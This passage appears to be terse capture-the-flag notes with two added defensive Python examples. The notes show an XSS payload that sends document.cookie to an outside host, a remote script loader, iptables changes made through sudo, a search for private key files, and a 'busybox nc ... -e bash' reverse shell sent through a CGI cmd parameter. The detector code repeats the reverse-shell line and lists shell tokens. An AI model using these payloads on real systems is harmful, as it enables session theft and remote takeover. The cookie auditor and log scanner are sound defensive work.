ftp

<script>fetch("http://10.17.6.173:9000",{method: "POST", body: document.cookie});</script>

XSS at registration time; the file is in the css folder on Kali
<script src=http://10.17.6.173:9000/exfil.js></script>
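The payload above works because the session cookie is readable from `document.cookie`. An added example (not part of the original notes) that audits `Set-Cookie` headers for the flags that blunt this: `HttpOnly` keeps the cookie out of script reach entirely, `Secure` and `SameSite` limit where the browser will send it. The header values are constructed samples.

```python
"""Audit Set-Cookie headers for flags that blunt cookie theft via XSS."""


def parse_set_cookie(header):
    """Return (cookie_name, {attribute_lowercase: value_or_True}) for one header value."""
    parts = [p.strip() for p in header.split(";")]
    name, _, _ = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True
    return name.strip(), attrs


def missing_cookie_flags(header, accepted_samesite=("strict", "lax")):
    """Return (cookie_name, [missing flag names]) for a Set-Cookie header value."""
    name, attrs = parse_set_cookie(header)
    missing = []
    if "httponly" not in attrs:          # without HttpOnly, document.cookie exposes it
        missing.append("HttpOnly")
    if "secure" not in attrs:            # without Secure, it also travels over plain HTTP
        missing.append("Secure")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in accepted_samesite:
        missing.append("SameSite")
    return name, missing


# Constructed sample headers: a weak one and its hardened form.
WEAK_COOKIE = "session=abc123; Path=/"
HARDENED_COOKIE = "session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    for hdr in (WEAK_COOKIE, HARDENED_COOKIE):
        name, missing = missing_cookie_flags(hdr)
        print(f"{name}: missing {missing or 'nothing'}")
```

Run it against a server's real `Set-Cookie` response headers; any session cookie reported as missing `HttpOnly` is one that an injected script of the kind shown above could read.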

How it was found

So is this why iptables was given sudo rights?

sudo /usr/sbin/iptables -L --line-numbers
sudo /usr/sbin/iptables -D INPUT
sudo /usr/sbin/iptables -I INPUT -p tcp --dport 41312 -j ACCEPT

find / -name "*.key" 2> /dev/null
The traffic is TLS, so find the key first

-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----

Import the TLS certificate

Frame 69: 631 bytes on wire (5048 bits), 631 bytes captured (5048 bits)
Ethernet II, Src: PCSSystemtec_65:c7:bf (08:00:27:65:c7:bf), Dst: PCSSystemtec_7f:2f:1d (08:00:27:7f:2f:1d)
Internet Protocol Version 4, Src: 10.133.71.33, Dst: 10.13.64.69
Transmission Control Protocol, Src Port: 58654, Dst Port: 41312, Seq: 1116, Ack: 1660, Len: 565
Transport Layer Security
Hypertext Transfer Protocol
GET /cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id HTTP/1.1\r\n
[Expert Info (Chat/Sequence): GET /cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id HTTP/1.1\r\n]
Request Method: GET
Request URI: /cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id
Request Version: HTTP/1.1
Host: 10.0.2.15:41312\r\n
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Accept-Encoding: gzip, deflate, br\r\n
DNT: 1\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
Sec-Fetch-Dest: document\r\n
Sec-Fetch-Mode: navigate\r\n
Sec-Fetch-Site: none\r\n
Sec-Fetch-User: ?1\r\n
\r\n
[Full request URI: https://10.0.2.15:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id]
[HTTP request 1/1]
[Response in frame: 71]

https://10.10.239.33:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id

Remember it's HTTPS; that gets it straight away
https://10.10.239.33:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=busybox nc 10.17.6.173 9999 -e bash
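From the defender's side, the decrypted capture shows a CGI endpoint taking a `cmd` query parameter, and the two requests above (one `id`, one reverse shell) are exactly what should stand out in the web server's access log or in decrypted traffic. An added example, not from the original notes: it parses HTTP request lines, pulls out the query parameters, and grades any command-style parameter by whether its value contains shell metacharacters or known reverse-shell tokens. The sample request lines are constructed from the URIs on this page (spaces percent-encoded as a browser would send them); the parameter and token lists are assumptions to tune for a real environment.

```python
"""Flag command-execution parameters in HTTP request lines."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request lines, modelled on the capture above.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id HTTP/1.1",
    "GET /cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN"
    "&cmd=busybox%20nc%2010.17.6.173%209999%20-e%20bash HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
SHELL_META = re.compile(r"[;&|`$<>]")
# Assumed watch-lists; extend for the environment being monitored.
COMMAND_PARAMS = ("cmd", "exec", "command")
REVERSE_SHELL_TOKENS = ("nc ", "ncat", "busybox", "/dev/tcp", "-e bash", "-e sh", "bash -i")


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into method, path and decoded query params."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"method": m.group("method"), "path": parts.path, "params": params}


def classify_request(line):
    """Return (severity, finding) where severity is benign/medium/high/unparsed."""
    req = parse_request_line(line)
    if req is None:
        return "unparsed", None
    for name in COMMAND_PARAMS:
        if name not in req["params"]:
            continue
        value = req["params"][name]
        reasons = []
        if any(tok in value for tok in REVERSE_SHELL_TOKENS):
            reasons.append("reverse-shell-token")
        if SHELL_META.search(value):
            reasons.append("shell-metacharacter")
        if "/cgi-bin/" in req["path"]:
            reasons.append("cgi-endpoint")
        # Any command-style parameter is worth a look; reverse-shell tokens are high.
        severity = "high" if "reverse-shell-token" in reasons else "medium"
        return severity, {"param": name, "value": value, "reasons": reasons}
    return "benign", None


def scan(lines):
    """Return [(line, severity, finding)] for every non-benign request line."""
    out = []
    for line in lines:
        severity, finding = classify_request(line)
        if severity not in ("benign", "unparsed"):
            out.append((line, severity, finding))
    return out


if __name__ == "__main__":
    for line, severity, finding in scan(SAMPLE_REQUESTS):
        print(f"[{severity}] {finding['param']}={finding['value']!r} {finding['reasons']}")
```

Point `scan()` at the request-line column of an access log; with TLS terminated at the server the log already holds the decrypted URI, so no key handling is needed for this check.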

sudo -l, then straight to privilege escalation